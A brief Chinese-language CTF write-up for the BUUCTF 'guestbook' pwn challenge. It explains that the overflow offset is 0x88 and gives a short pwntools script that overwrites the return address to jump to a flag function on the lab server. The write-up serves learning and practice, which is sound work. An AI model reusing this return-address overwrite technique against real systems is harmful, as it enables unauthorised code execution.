讲真这道题目,我一看伪代码还以为又是ret2libc的题目,我直接就去找wp了,结果
    有后面函数 。。。。
    还有坑。。。。
    image.png
    这里主要没有push ebp 也就是说只是单纯的sub rsp xxx 就是溢出的地方单纯的0x88就ok了
    当然,libc的做法肯定也打得通,,,不过没必要了,前面buu一大堆的libc的题目,不差这一道

    1. from pwn import *
    2. from LibcSearcher import*
    3. context(log_level = 'debug')
    4. #io = process("./guestbook")
    5. io = remote("node4.buuoj.cn",26023)
    6. #context.arch = "amd64"
    7. elf = ELF('./guestbook')
    8. flag_addr = 0x0000000000400620
    9. payload1 = b'a'*0x88 + p64(flag_addr)
    10. io.sendline(payload1)
    11. io.interactive()